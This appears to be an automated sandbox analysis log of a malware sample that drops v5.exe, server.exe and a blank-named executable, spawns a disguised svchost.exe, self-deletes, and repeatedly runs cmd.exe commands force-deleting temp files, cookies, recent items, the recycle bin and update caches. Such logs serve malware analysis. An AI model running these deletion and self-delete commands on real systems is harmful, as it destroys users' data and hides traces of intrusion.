Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Temp\server.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: hra33.dll	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sfc_os.dll	Jump to behavior
